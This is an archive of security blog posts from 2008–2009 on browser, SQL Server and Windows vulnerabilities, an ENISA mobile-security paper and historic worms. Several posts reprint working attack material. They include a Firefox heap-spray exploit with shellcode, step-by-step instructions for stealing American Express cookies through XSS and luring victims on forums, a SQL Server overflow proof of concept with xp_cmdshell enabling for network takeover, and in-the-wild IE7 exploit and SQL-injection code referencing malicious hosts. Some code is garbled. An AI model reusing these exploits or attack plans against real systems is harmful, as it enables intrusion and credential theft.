Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Vulnerability

Firefox Javascript Vulnerability

with one comment

Once again, Javascript is the source of a new exploit that has been recently discovered on Firefox1. The vulnerability can be exploited by crafting malicious Javascript code on a Firefox 3.5 browser and leads to the execution of arbitrary code on the user’s machine. This is due to a vulnerability in the JIT engine of Firefox and affects machine running a x86, SPARC or arm architectures.

The vulnerability resolves around the return value of the escape function in the JIT engine. It’s exploited using the <font> tag. The code for the exploit is public and can be found at milw0rm. The exploit use a heap spraying technique to execute the shellcode.

<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">


<FONT>Loremikdkw  </FONT>
<script language=JavaScript>

/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
    fullblock += fullblock;
sprayContainer = new Array();
for (i=0; i<600; i++)  
    sprayContainer[i] = fullblock + shellcode;
var searchArray = new Array()
function escapeData(data)
 var i;
 var c;
 var escData='';
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
 return escData;
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
                searchArray[i+1]["str"] = oTags[0].innerHTML;
function GenerateHTML()
    var html = "";
    for (i=1;i<searchArray.length;i++)
        html += escapeData(searchArray[i]["str"])


# [2009-07-13]

A fix should be available soon, but the best solution is always to disable Javascript, although a lot of sites rely on it to operate. Another way is to use the NoScript plug-in, which let you enable and disable scripts easily according to a whitelist/blacklist system.

See also:

Mozilla Firefox Memory Corruption Vulnerability”, Secunia, July 14, 2009, accessed on 2009-07-15

Exploit 9137”, SBerry, July 13, 2009, accessed on 2009-07-15

Stopgap Fix for Critical Firefox 3.5 Security Hole”, Brian Krebs, The Washington Post, July 14, 2009, accessed on 2009-07-15

Critical JavaScript vulnerability in Firefox 3.5”, Mozilla Security Blog, July 14, 2009, accessed on 2009-07-15

1 “Mozilla Foundation tackles Firefox bug”, Nick Farell, The Inquirer, Wednesday, 15, July, 2009, accessed on 2009-07-15

Written by Jonathan Racicot

July 15, 2009 at 3:41 pm

A Quick Amex XSS

with one comment

Here is a quick description of a cross-site script exploit that was fixed today on the American Express website.

The vulnerability was in the search engine of the site, which didn’t sanitized the input keywords. Therefore anyone could insert JavaScript into the search and use this to trick people into sending their cookies to the attacker.

All you need to do is

1)      Setup a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)

2)      Create a script to save the stolen cookies into a file or database and put it online.

3)      Get the link of the malicious search link. The code snipplet needed to cause the search to inject JavaScript is:


Where XXX is your code that does what ever you want it to do. If you want to steal the cookie, it code would then be something like:


So the link to use to lure people into sending their cookies would be something like:’’%2Bdocument.cookie%3C/script%3E

4)      Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)

Now this XSS have been fixed after it started to go public. This folk[1], who found the bug, had a particular hard time convincing Amex about this security problem.

A video of the simple exploit is available  at :

See also:

American Express web bug exposes card holders“, Dan Goodin, The Register, December 16, 2008, (accessed on December 17, 2008)

[1] “Holistic Security”, Russ McRee, December 17, 2008 (accessed on December 17, 2008)

Written by Jonathan Racicot

December 17, 2008 at 4:32 pm

Microsoft’s Security Hole Framework

with one comment

Since a few days, news about the Internet Explorer exploit has been sweeping the Internet (see previous post Internet Explorer 7 Attack in the Wild). It has not been confirmed that Internet Explorer 5, 6 and 7 are affected and the problem reside in the data binding of objects. Basically, the array containing objects in memory is now updated after their deletion; therefore the code stays in memory:

The vulnerability is caused by memory corruption resulting from the way Internet Explorer handles DHTML Data Bindings. This affects all currently supported versions of Internet Explorer. Malicious HTML that targets this vulnerability causes IE to create an array of data binding objects, release one of them, and later reference it. This class of vulnerability is exploitable by preparing heap memory with attacker-controlled data (“heap spray”) before the invalid pointer dereference[1].

A patch as now been issued by Microsoft[2], so update your Windows….now!

Another vulnerability that hasn’t made as much noise is the one found by SEC Consult Vulnerability Lab[3], probably because this vulnerability is in Microsoft SQL Server 2000 and 2005, which is not as widely known as Internet Explorer. Not to forget the hole found in Wordpad also[4]. This is significant though, as Microsoft now offer a complete framework for hackers to exploit a Microsoft system.

Therefore, it is now possible for an attacker to execute arbitrary code on a server using SQL server, which might be use to modify web pages to exploit the Internet Explorer vulnerability. Imagine an intranet with a web server running Windows Server 2003, a SQL Server as its database and where all clients are forced to run Internet Explorer. Now an employee with the appropriate knowledge could practically own the entire network. The hardest part would be to find the injection point. That means studying and testing the Intranet website for unsanitized input. If he can’t, just try to social engineer your way by sending a malicious WRI file to one of the administrator.

If one injection point can be found, then he could own the SQL Server using the last vulnerability discovered in SQL Server. This exploit will cause SQL Server to write memory and therefore allowing execution of arbitrary code. This is done by using the sp_replwritetovarbin stored procedure with illegal arguments. Bernhard Mueller has released a proof-of-concept script that can be used to verify if the database is vulnerable to the attack:

@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
  SET @counter = @counter + 1
  SET @buf = @buf + @val

SET @buf = @buf + ''',''1'',''1'',''1'',

EXEC master..sp_executesql @buf

This procedure will trigger an access violation if the current SQL Server is vulnerable. Then one only needs to append correctly the appropriate shellcode to the buffer “@buf” and gain new privileges. Once the database is yours, look for fields in tables that are used to make links on the web server of the intranet, and use the technique described in this previous article on how this can give you access to about every computer that connects to the webserver. Of course if the database contains sensible information such as passwords, this step might not be necessary.

You could also spawn a command shell from SQL Server by enabling the xp_cmdshell stored procedure:

EXEC master.dbo.sp_configure 'show advanced options', 1
EXEC master.dbo.sp_configure 'xp_cmdshell', 1

And then executing any command you wish with that command:


After that, the network is yours. But what if SQL Server is not installed? Apparently Wordpad is there to the rescue….or almost as this exploit only apply to Windows XP SP2, Windows 2000 and Windows Server 2003. This exploit will result in the attacker gaining the same privilege as the user that opened the malicious .wri file, therefore here is another reason not to use your computer as Administrator. According to the advisory:

When Microsoft Office Word is installed, Word 97 documents are by default opened using Microsoft Office Word, which is not affected by this vulnerability. However, an attacker could rename a malicious file to have a Windows Write (.wri) extension, which would still invoke WordPad[5].

The source of the problem comes from the Wordpad Text Converter, a component use to read Word documents even if Microsoft Word isn’t installed on the system. Not much is known about this attack. Trend Micro as an article about it and a trojan[6], identified as TROJ_MCWORDP.A[7] using this vulnerability.

This attack is triggered when the user opens a .WRI, .DOC or .RTF file, most of the time sent by e-mail. Apparently this trojan looks to see if it runs in a virtual environment (VMWare). If it is not, it drops a BKDR_AGENT.VBI file, which will open a random port on the machine it just infected, opening it to the entire world.

Schema of the Wordpad Attack (Image from Trend Micro)

Schema of the Wordpad Attack (Image from Trend Micro)

See also:

New MS SQL Server vulnerability“, Toby Kohlenberg, SANS Internet Storm Center, December 15, 2008, (accessed on December 16, 2008)

Microsoft looking into WordPad zero-day flaw“, Robert Vamosi, CNet News, December 10, 2008, (accessed on December 16, 2008)

Vulnerability Note VU#926676“, US CERT, December 11, 2008, (accessed on December 16, 2008)

[1] “Clarification on the various workarounds from the recent IE advisory”,  Microsoft, December 12, 2008, (accessed on December 16, 2008)

[2] “Microsoft Issuing Emergency Patch For Internet Explorer”, Thomas Claburn, InformationWeek, December 16, 2008, (accessed on December 16, 2008)

[3] “Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability”, Bernhard Mueller, SEC Consult Vulnerability Lab, December 4, 2008, (accessed on December 16, 2008)

[4] “Exploit for unpatched WordPad, IE flaws in the wild”, Peter Bright, Ars Technica, December 10, 2008, (accessed on December 16, 2008)

[5] “Microsoft Security Advisory (960906)”,  Microsoft Technet, December 9, 2008, (accessed on December 16, 2008)

[6] “A Word(pad) of Caution”, Roderick Ordoñez, Trend Micro, (accessed on December 16, 2008)

[7] “TROJ_MCWORDP.A”, Trend Micro, December 11, 2008, (accessed on December 16, 2008)

Internet Explorer 7 Attack in the Wild

with 6 comments

Bits of information about the new 0-day exploit are surfacing on the web. This exploit provokes a heap overflow in the XML parser of Internet Explorer 7. The exploit works with the fully patched version of Windows XP, Windows Server 2008 and Windows Vista SP1[1].

The Infection

The exploit is initiated by a JavaScript file stored on infected servers across the web. The example given by the SANS Internet Storm Center is located at http://17gamo [dot] com/1.js. F-Secure also reported the URL as being infected. The content of the JavaScript file is injected through sites by a SQL injection attack and it contains a link to a web page containing the exploit and the shellcode. A complete list of infected websites can be found at Shadowserver.

The contents of the 1.js file (be careful of what you do with this info!):

document.writeln("<script src=\"http:\/\/\/click.aspx?id=484329676&logo=1\">
document.write("<iframe width=100 height=0 src=>

The SQL injection works by adding a link to every text field contained in an accessible database. Therefore, once text contained in the database is retrieved to be displayed on the webpage, the malicious link to the JavaScript is also included in it and executes the contents of the file, which contains two statements.  One is a counter to measure how many victimes it made, the other is an iFrame to the malicious webpage. The SQL injection usually takes this form, but it really depends on which software is attacked:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js>
</script>''')FETCH NEXT FROM

The Exploit

This is part of the JavaScript found in the while. It checks the version of the browser and OS and triggers the buffer overflow:


nav = navigator.userAgent.toLowerCase();

if (navigator.appVersion.indexOf(‘MSIE’) != -1) {
    version = parseFloat(navigator.appVersion.split(‘MSIE’)[1])

if (version==7) {
w2k3 = ((nav.indexOf(‘windows nt 5.2’) != -1) || (nav.indexOf(‘windows 2003’) != -1));
wxp = ((nav.indexOf(‘windows nt 5.1’) != -1) || (nav.indexOf(‘windows xp’) != -1));

    if (wxp || w2k3)
document.write(‘<XML ID=I><X>    <C><![CDATA[<image 
SRC=http://&amp;#2570;&amp;#2570;    >]]></C></X>

    var i=1;
    while (i <= 10 ) {
        window.status= “ ”; i++;

You can get a working example at

The script used in the wild waits for 6 seconds before starting, apparently to fool anti-viruses. It then verifies if the current browser is Internet Explorer and if it’s version 7. It also checks that the OS is Windows XP or 2003 (but the exploit does work in Vista also). If all conditions are met, the script will then write the malformed XML code to exploit to the parser. The loop at the end keeps the status bar from displaying any information to the user. The parsing of the XML code will trigger a heap overflow in the parser and arbitrary code can be executed.

The vulnerability is explained more in detailed by the Chinese researchers[2] that first discovered the exploit and that released the code by mistake. The original article is written in Mandarin, but a rough translation from Google leads to a mistake in the handling of pointers when “SDHTML objects” are created. A machine translated post on a forum gave that information[3]:

Recently caught using IE7 0day vulnerability code, as in dealing with the object SDHTML errors lead to memory disorders, through the structural conditions of a specific code lead to cross-border memory. 现已有人赶制出网马生成器相信会在短期内流行。 It was now working towards a network of horse generator, will be popular in the short term. 该漏洞存在于IE7XML可以导致内存越界的漏洞攻击者通过构造畸形XML代码并且使用JavaScript脚本操作ShellCode去执行任意代码。 The vulnerability exists in IE7’s XML, the memory can lead to cross-border loopholes, the attacker through the abnormal structure using JavaScript and XML code script ShellCode operation to execute arbitrary code.
漏洞描述 Description of the loopholes:
由于SDHTML里处理对象存在错误导致内存紊乱通过构造某种条件可以使得SDHTML检测到错误释放已被分配的对象但是在释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行如果这些内存又被分配给其他用途将导致SDHTML把这些内存当作一个对象来操作。 SDHTML due to errors in handling the object lead to memory disorders, through some kind of structural conditions can make mistakes SDHTML detected the release of the allocation has been the target, but the release has been the target of the distribution did not return after SDHTML be released but continue to use the object The implementation of the memory, if memory has been allocated to other purposes, such SDHTML will lead to memory as an object to the operation. 攻击者使用了XMLSRC字符串对象占用了这些释放对象的空间而对象指针里包含函数例程指针最终导致代码执行。 An attacker using the XML string SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

This hole wasn’t patch with the latest update from Microsoft. No details are available on when a hotfix will be distributed. Disabling Active Scripting will prevent this exploit from downloading the Trojan. Doing so will also protect anyone from most of the online attacks (but it will also make some sites unusable). Other solution: use Firefox or Opera. And for the geekiest, you can always use the safest browser around by downloading it here.

Observed Payload

Right now, it seems these attacks using this exploit are limited to MMORPG password stealers. The shellcode included with the current exploit will download http://www [dot] steoo [dot] com/admin/win.exe[4]. F-secure detect the trojan contained in the file as Win32.Magania and as Infostealer.Gamania[5] by Symantec. This malware is a game password stealing Trojan for games created by the Taiwanese company Gamania, creator of Maple Story amongst others.

The trojan will create various files into the %SYSTEM% directory and add himself in the registry so that it boots every time the computer starts. Files created include[6]:

  • %System%\Kerne0223.exe
  • %System%\Kerne0223.dll
  • %Windir%\SVCH0ST.EXE
  • %System%\aer4532gxa.dll (detected as Infostealer.Lineage)
  • [PATH TO TROJAN]\gg.bat
  • %System%\drivers\etc\hosts
  • c:\log.txt

And will steal every credentials entered by the user on these sites:

  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [http://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]
  • [https://]

It is strongly believed that this Trojan origin is based in China. Various variants of this Trojan have been created. Variants may come with a keylogger and rootkits.

See also:

“Microsoft Security Advisory (961051)”, Microsoft, December 10, 2008, (accessed on December 11, 2008)

“Mass SQL Injection”, F-Secure, December 11, 2008, (accessed on December 11, 2008)

“Chinese researchers inadvertently release IE7 exploit code”, John Leyden, The Register, December 11, 2008, (accessed on December 11, 2008)

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl

[1] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, (accessed on December 11, 2008)

[2] “Alert: IE70DAY attack code has been linked to the use of  Trojan Horse”, December 12, 2008, (accessed on December 11, 2008 – Eastern Time GMT-5)

[3] Translated by Google Translate from Chinese, (accessed on December 11, 2008)

[4] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, (accessed on December 11, 2008)

[5] “Infostealer.Gamania”, Hiroshi Shinotsuka, Symantec, February 13, 2007, (accessed on December 11, 2008)

[6] Ibid.

ENISA releases list of mobile phones vulnerabilities

with 2 comments

The European Network and Information Security Agency (ENISA) release a paper about general vulnerabilities that is affecting or will affect mobile communications. The organization surveyed experts via different medias to gather concerns from the industry about the future of wireless communications. The document discusses security issues about three different types of devices, each using wireless mechanism: mobile devices, contactless cards and smart cards.

Mobiles phones

The paper mentions two possible vulnerabilities on mobiles, which one of them is rather obvious and really didn’t need to be detailed:

  • Theft or Loss of device
  • Untrustworthy Interface

Since a lot of information is store on cells phones and other devices, theft can be a security issue, especially if used in a commercial/governmental context. Since mobiles devices are called to be

Untrustworthy interface refers to any exploits, worms or social engineering that usually affects computers. After all, mobiles use operating systems like any computer such as Android, Windows Mobile, Symbian OS, Linux or iPhone OS

Untrustworthy interface refers to any exploits, worms or social engineering that usually affects computers. After all, mobiles use operating systems like any computer such as Android, Windows Mobile, Symbian OS, Linux or iPhone OS

used for more and more uses, such as purchasing items and services as it’s actually done in Japan, theft will be a problem. As far as I know, not much can be done to prevent mobiles from being stolen except caution. On the other hand, encryption and authentification should be use to protect data stored inside the device.

Untrustworthy interface refers to any exploits, worms or social engineering that usually affects computers. After all, mobiles use operating systems like any computer such as Android, Windows Mobile, Symbian OS, Linux or iPhone OS. None of the OS can pretend to be 100% secure, and none should ever do either. For those who think that such things doesn’t happen on phones, here are a couple of example that might change your mind:

Last year, at the Black Hat conference which took place August 2nd, an attack against the iPhone was carried out by a team at the Independent Security Evaluators security company[1]. By setting up a fake access point with the same SSID and encryption type that an access point previously used by the user, one could use the fake access point to add malicious code to websites requested by the user[2].

At the beginning of the year, Symbian OS was victim of another worm, called Beselo that spread itself by harvesting contacts and sending MMS with a SIS attachment disguised as a picture or mp3 file[3].

In October, Google’s Android shipped with an outdated version of the WebKit package, which could allowed an attacker to steal saved passwords and cookies by crafting a malicious website[4].

Do I even need to give examples for the Windows Mobile OS? If yes, then the ones who come in mind what the one found by Collin Mulliner a while ago and disclosed at the 23rd CCC[5]

As mobile phones become more and more computers, exploiting cell phones will become more and more common.

Smart Cards

The paper mention specifically two issues concerning smart cards:

  • Physical Attacks
  • Side Channel Attacks

Physical attacks consist of studying the underlying hardware in order to reverse-engineer it:

“These kinds of attacks are usually invasive, eg, rewiring a circuit on the chip or using probing pins to monitor data flows. Physical attacks include altering the environment around the card, such as temperature or radiation, in order to induce faults. The goal of the attacker is to bypass security mechanisms and gain secret information stored on the card. In general, modern smart cards are quite resistant to physical attacks. Nevertheless, there have been a number of reverse-engineering attacks in attempts to retrieve private keys or find flaws in the hardware design.[6]

This usually involves a lot of different techniques and lots of time. Concrete examples of applying a physical attack on smart cards could go back to 2002, when two researchers from Cambridge University discovered they could extract data from smart cards by using a camera flash. Without forgetting that modern smart cards are often programmed with a subset of Java, therefore open to programming errors and exploit[7].

Side-Channels attacks are way touchier as they imply retrieving information from the card by analysing physical properties such as power consumption, radiation and signals duration to steal data from the card[8]. Using side-channel attacks can lead to the gathering of sensible information about the implementation of a cryptographic algorithm:

One of the most successful side-channel attacks exploits the correlation between the power consumption of a given device and the data being processed. These Power Analysis Attacks have particular relevance since for some of them, no knowledge regarding the implementation of the target device is needed in order to be effective.[9]

Contactless Cards

  • Skimming
  • Eavesdropping
  • Tracking
  • Relay Attack
  • Falsification of Content
A brilliant example of a skimming attack was the work done in the now infamous Oyster card case

A brilliant example of a skimming attack was the work done in the now infamous Oyster card case

A brilliant example of a skimming attack was the work done in the now infamous Oyster card case[10]. After reverse-engineering the MIFARE contactless card[11] by using acid to remove the plastic and studying the architecture of the hardware used in the card, the encryption algorithm was understood and could be cracked. In order for the hack to work, the attacker needs to skim the victim Oyster card by building a custom reader.

The last attack that I will shortly describe in this article is the relay attack as the others are well known. The relay attack is simply a man-in-the-middle attack, that will send data skimmed from a card to a reader by using a middle attacker relay.

The document also states two other vulnerabilites, which could be applied to various types of devices actually: cryptanalytic attacks and man-in-the-middle attacks (see Cyber-Espionage : The Triggerfish for an example of cell phone man-in-the-middle attack).

The paper also goes on with various use-case scenarios of these attacks for your reading pleasure.

See also:

Security Issues of Authentication Using Mobile Devices”, Ingo Naumann, Giles Hogben, November 21, 2008, (accessed on December 3, 2008)

PocketPC Security Research“, Collin Mulliner, July 9, 2007, (accessed on December 3, 2008)

Optical Fault Induction Attacks“, Sergei P. Skorobogatov, Ross J. Anderson, University of Cambridge, (accessed on December 3, 2008)

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl

[1] “IPhone Flaw Lets Hackers Take Over, Security Firm Says”, John Schwartz, The New York Times, July 23, 2007, (accessed on December 3, 12)

[2] “Exploiting the iPhone”, Independent Security Evaluators, 2007, (accessed on December 3, 2008)

[3] “Fortinet: Symbian OS worm spreading in mobile networks”, Jack Rogers, SC Magazine, January 23. 2008, (accessed on December 3, 2008)

[4] “Vulnerability patched in Google’s Android-powered phone”, Angela Moscaritolo, November 03, 2008, (accessed on December 3, 2008)

[5] “How to Exploit A Windows Mobile Handset”, Sergiu Gatlan, January 4, 2007, (accessed on December 3, 2008)

[6] “Security Issues of Authentication Using Mobile Devices”, Ingo Naumann, Giles Hogben, November 21, 2008, p.10

[7] “Smart Card Security from a Programming Language and Static Analysis Perspective”, Xavier Leroy, INRIA Rocquencourt, Trusted Logic, 2003, (accessed on December 3, 2008)

[8] “Security Issues of Authentication Using Mobile Devices”, Ingo Naumann, Giles Hogben, November 21, 2008, p.10

[9] “Power Attacks Resistance of Cryptographic S-boxes with added Error Detection Circuits”, Francesco Regazzoni, Thomas Eisenbarth, Johann Großschädl, Luca Breveglieri, Paolo Ienne, Israel Koren, Christof Paar, University of Lugano, 2007, (accessed on December 3, 2008)

[10] “Oyster card hack published, released at security conference”, Nicholas Deleon, CrunchGear, October 7, 2008, (accessed on December 3, 2008)

[11] “Dismantling MIFARE Classic”, Flavio D. Garcia, Gerhard de Koning Gans, Ruben Muijrers,Peter van Rossum, Roel Verdult, Ronny Wichers Schreur, Bart Jacobs, Radboud University Nijmegen, 2008, (accessed on December 3, 2008)

New Kid on the Block: Downadup

leave a comment »

Many reports on the last few days mention a new worm growing on the back of the Windows’ MS08-067 vulnerability. The worm named Downadup, also being dubbed Conficker.A by Microsoft, as now spread to alarming levels: “We think 500,000 is a ball park figure” said Ivan Macalintal, a senior research engineer with Trend Micro Inc[1].

The Exploit

The vulnerability is located in the Windows Server service, which is used to share networks files and printers across computers on a Windows network. This service is used by all Windows versions, even the Windows 7 Pre-Beta version, therefore making every Windows user vulnerable unless patched[2]:

Microsoft Windows 2000 Service Pack 4 Windows Server 2003 with SP1 for Itanium-based Systems
Windows XP Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
Windows XP Service Pack 3 Windows Vista and Windows Vista Service Pack 1
Windows XP Professional x64 Edition Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows XP Professional x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems*
Windows Server 2003 Service Pack 1 Windows Server 2008 for x64-based Systems*
Windows Server 2003 Service Pack 2 Windows Server 2008 for Itanium-based Systems
Windows Server 2003 x64 Edition Windows Server 2003 x64 Edition Service Pack 2

Vulnerable Operating System by the MS08-67 Exploit

The exploit is executed by sending a specially crafted packet to the RPC (Remote Procedure Call) interface. The interface could be reach by an attacker if there are no firewalls activated or if the File/Printer sharing options is enabled and connected to the Internet. The packet will cause a buffer overflow which allows arbitrary code to be executed.

The core of the exploit comes from a buffer overflow created when parsing a specific path. The exploit occurs when specially crafted packet is sent to port 139 or 445 on a Windows file/printer sharing session. The reception of that package will trigger a call to the RPC API NetPathCompare() and NetPathCanonicalize() functions.

The exploit is triggered when giving a specific path to canonicalize, such as “\c\..\..\AAAAAAAAAAAAAAAAAAAAAAAAAAAAA”[3] to the NetPathCanonicalize function, which uses the _tcscpy_s macro, which in turns calls the wcscpy_s function[4]. This function is used to copy a wide-character string from a location in memory to another. The buffer overflow is provoked by a miscalculation in the parameters given to the _tcscpy_s macro by the NetPathCanonicalize() function.

The _tcspy_s function is called like this by the NetPathCanonicalize:

_tcscpy_s(previousLastSlash, pBufferEnd – previousLastSlash, ptr + 2);

NetPathCanonicalize contains a complex loop to check the path for dots, dot-dots, slashes while making a lot of pointer calculations. Once the loop is passed over a couple of time, the previousLastSlash parameter gets an illegal value.

The RPC call

To exploit this vulnerability, all one have to do is to bind with the SRVSVC pipe of the Windows Server Service, which is the RPC interface and bind with it. If this is successful, a call to the NetPathCanonicalize()function with a specially crafted path as shown above, is done, then it’s only a matter of providing the payload. Exploits are already public on sites such as milw0rm[5].

The New Worm: Downadup

Downadup is the new worm to use the exploit on a large scale and has proved to be widely successful even if it’s already been one month since the vulnerability was found and patched.

Once installed on a system, the worm will copy itself with a random name into the system directory %systemroot%\system32 and register itself as a service[6]. It will, of course, also add itself into the registry with the following key:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<name>.dll
    ImagePath = %SystemRoot%\system32\svchost.exe -k netsvcs
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\netsvcs\Parameters\”ServiceDll” = “<name>.dll”

It will then use those sites to get the newly infected machine’s IP address:

With the IP address, Downadup can download a small HTTP server (““) and open a HTTP server on the current machine with the following address[7]:


Once the HTTP server is set up, it will scan for other vulnerable machines and when a target is found, the infected machine URL will be sent to the target as the payload. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Therefore, there is no centralized point of download. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine[8].

According to Symantec, it has a domain name generating algorithm based on dates just like the Srizbi has (see Srizbi is back for more details on the algorithm). It also deletes any prior Restore Points saved by the user or the system[9].

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl

[1] “New Windows worm builds massive botnet”, Gregg Keizer, ComputerWorld, December 1, 2008, (accessed on December 1, 2008)

[2] “Microsoft Security Bulletin MS08-067 – Critical”, Microsoft, October 23, 2008, (accessed on December 2, 2008)

[3] “Gimmiv.A exploits critical vulnerability (MS08-067)”, Sergei Shevchenko, October 23, 2008, (accessed December 2, 2008)

[4] “MS08-067 and the SDL”, The Security Development Lifecycle, October 22, 2008, (accessed on December 2, 2008)

[5] See MS08-067 Exploit by Debasis Mohanty and MS08-067 Remote Stack Overflow Vulnerability Exploit for examples.

[6] “F-Secure Malware Information Pages: Worm:W32/Downadup.A”, F-Secure Corporation, November 26, 2008, (accessed on December 2, 2008)

[7] “W32.Downadup”, Symantec, Takayoshi Nakayama and Sean Kiernan, November 24, 2008, (accessed on December 2, 2008)

[8] “Microsoft warns of new Windows attacks”, Gregg Keizer, ComputerWorld, December 1, 2008, (accessed on December 2, 2008)

[9] “Worm:Win32/Conficker.A”, Joshua Phillips, Microsoft Malware Protection Center, 2008, (accessed on December 2, 2008)

First Internet Worm is 20 years old Sunday

with one comment

In 1988, the computer world faced a new cyber menace that is still very well alive today. The first computer worm, written by a student called Robert Tappan Morris.

From Wikipedia:

“The original intent, according to him, was to gauge the size of the Internet. He released the worm from the Massachusetts Institute of Technology (MIT) to conceal the fact that it actually originated from Cornell. The worm was designed to count how many machines were connected to the Internet. Unknown to Morris, the worm had a design flaw. The worm was programmed to check each computer it found to determine if the infection was already present. However, Morris believed that some administrators might try to defeat his worm by instructing the computer to report a false positive. To compensate for this possibility, Morris directed the worm to copy itself anyway, fourteen percent of the time, no matter the response to the infection-status interrogation.”

Infection Map of the Code Red Worm

Infection Map of the Code Red Worm

Nowadays, worms are notorious for spreading malicious payloads across the entire Internet. It also known as an extremely efficient cyber weapon to mass exploit vulnerabilities on a large scale. Popular worms include Code Red, in 2001, which infected up to 359 000 machines[1], Klez, Blaster, Sasser are also notorious computer worms. Here is a table of notorious worms from the last decade:



Damage ($US)

CIH 1998 $20 to $80 million
Melissa 1999 $1 billion
ILoveYou 2000 $5.5 billion to $8.7 billion in damages; ten percent of all Internet-connected computers hit
Code Red 2001 $2 billion; a rate of $200 million in damages per day
SQL Slammer 2003 Shut down South Korea’s online capacity for 12 hours; affected 500,000 servers worldwide
Blaster 2003 between $2 and $10 billion; hundreds of thousands of infected PCs
Sobig 2003 500,000 computers worldwide; as much as $1 billion in lost productivity
Sasser 2004 tens of millions of dollars; shut down the satellite communications for some French news agencies; several Delta airline flights were cancelled; shut down numerous companies’ systems worldwide
MyDoom 2004 Slowed global Internet performance by 10 percent and Web load times by up to 50 percent
Bagle 2004 Tens of millions of dollars

Table 1.0 – Top 10 Computer Worms[2]

See also:

Morris worm turns 20: Look what it’s done“, Carolyn Duffy Marsan, Network World, October 30, 2008, (accessed October 31, 2008)

Morris Worm To Turn 20 – How Far Things Have Come“, Darknet, October 31, 2008, (accessed October 31, 2008)

[1] “The Spread of the Code-Red Worm (CRv2)”, David Moore, Colleen Shannon, CAIDA, September 14, 2007, (accessed October 31, 2008)

[2] “Top 10 worst computer viruses”, George Garza,, February 17, 2008, (accessed October 31, 2008)

Written by Jonathan Racicot

October 31, 2008 at 4:17 pm